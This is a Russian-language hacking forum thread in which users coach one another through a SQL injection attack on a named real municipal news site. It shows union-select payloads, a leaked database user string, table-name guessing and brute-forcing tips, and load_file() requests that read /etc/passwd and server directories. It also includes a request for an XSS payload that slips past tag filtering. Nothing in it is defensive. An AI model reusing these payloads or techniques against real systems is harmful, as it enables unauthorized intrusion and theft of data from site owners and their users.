PHP: http://www.sterlitamak.ru/arxnews.shtml?id=-873+ union+select+1,version(),3,4,5,6,7,8,9,0 подскажите с дальнейшими действиями,я запутался!Каким образом можно узнать полный путь к файлу arxnews.shtml Хоть что-нибудь подскажите,пожалуйста!
4.0.24_Debian-10sarge2-log:admstr:adminstr@localhost А дальше таблици подбирай - ...9,10+from+имятаблици/*
только подбирать названия?Ничего другого нельзя сделать? То есть нужно надеятся на удачу?или есть какой-нибудь другой способ
Есть. Особнно если учесть, что подписи не для красоты только (снизу слева). Ну или мою можешь попробовать скачать - пароль 123
http://www.sterlitamak.ru/arxnews.shtml?id=873{SQLINJ} select+1,2,3,4,5,6,7,8,9,0+from(????????????) как правильно составить запрос?table_name?
kevmen К программе есть подробный мануал, сайт и тема, зачем задавать вопросы ещё и сдесь? https://forum.antichat.ru/threadnav24918-1-10.html
kevmen, воспользуйся брутуром от Пашкелы. Он очень хороший и ничего лишнего... Словарь можно взять от проги SIPT и самому потом добавлять примерами из жизни. ЗЫ: В 4ой ветке часто таблица с юзерами называется [user()/database()]_user и т.д. Если не понял то приведу пример в твоей ситуации. adminstr_user и т.д... Не проверял. Сам по-подбирай)
Кто еще не в курсе, читаем про PROCEDURE ANALYSE() - с помощью этой процедуры можно выяснить некоторые таблицы в MySQL 4 http://raz0r.name/obzory/sql-inekcii-i-procedure-analyse/
Проблема такова, уязвимость в теге <br> и <b> как можно построить на их базе хсс которую понимают Большенство браузеов а не один Netsape и то 4.* версии? Просьба перед ответом самому проверить,работает ли ета xss...фильтрацыя почти всех спец-символов,ну пишите хоть ними,а там уже может чтото придумаю)
Ето вопше вопрос не по теме,сдесь задаються вопросы именно по уязвимостям конкретным,а не есть ли они вопше...
Lancellot Если скуль под рутом и ось фряха. На фре есть возможность просмотра каталога load_file('/'), ну или в хексе. если маджик квот-он
Ну можно, как сказали, через load_file('/'). Смотри пример: file.php?id=-1+1,2,load_file('/etc/passwd'),4,5-- 3 - выводимое поле. Я просто привел пример. Если есть ошибка, то загоняешь весь путь к файлу и там рыщешь.
хорошо, спасибо. теперь идем дальше... если к примеру субд mssql читая INFORMATION_SCHEMA.TABLES отвечает ли какая-нибудь таблица за местонахождение админки, ну естественно не во всех движках?
Не нужно переиначивать мои слова. Полный путь к файлу ничего не даст. Человек просил админку. Просмотр ФАЙЛОВ возможен на любой оси , если есть права(но он ничего не даст), а вот просмотр КАТАЛОГОВ возможен на фряхе. Тоесть, либо читаем конфиги и ищем дирректорию веба, а потом просматриваем её, либо , если есть расскрытие, сразу просматриваем ДИРРЕКТОРИЮ file.php?id=-1+1,2,load_file('/etc/'),4,5-- Выведит содержимое каталога etc НЕТ